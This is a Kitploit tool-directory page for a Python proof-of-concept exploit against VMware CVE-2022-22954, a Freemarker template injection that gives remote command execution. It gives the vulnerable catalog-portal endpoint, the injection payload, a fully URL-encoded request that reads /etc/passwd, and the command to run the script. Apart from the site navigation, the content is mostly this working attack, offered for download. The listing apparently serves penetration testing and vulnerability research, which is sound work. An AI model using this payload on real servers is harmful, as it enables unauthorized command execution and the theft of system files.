Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
VMware-CVE-2022-22954-Command-Injector — Python PoC for exploiting VMware CVE-2022-22954 via Freemarker template injection in the catalog-portal UI, enabling remote command execution on vulnerable VMware servers. | Kitploit
Tools/GitHubGitHub/emilyastranova/vmware-cve-2022-22954-command-injector
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubemilyastranova/vmware-cve-2022-22954-command-injector

VMware-CVE-2022-22954-Command-Injector

Python PoC for exploiting VMware CVE-2022-22954 via Freemarker template injection in the catalog-portal UI, enabling remote command execution on vulnerable VMware servers.

View Repository
1124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

VMware-CVE-2022-22954-Command-Injector

Proof of Concept for exploiting VMware CVE-2022-22954

How it works

This simple Python script makes a GET request to the specified URL appended with /catalog-portal/ui/oauth/verify?error=&deviceUdid= and then followed by a URL encoded version of this string:

root@kitploit:~
${"freemarker.template.utility.Execute"?new()("command")}

For example, an output for "cat /etc/passwd" would look like the following: {host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d

Instructions

root@kitploit:~
python3 exploit.py <URL>

References

  • https://github.com/sherlocksecurity/VMware-CVE-2022-22954
Download Tool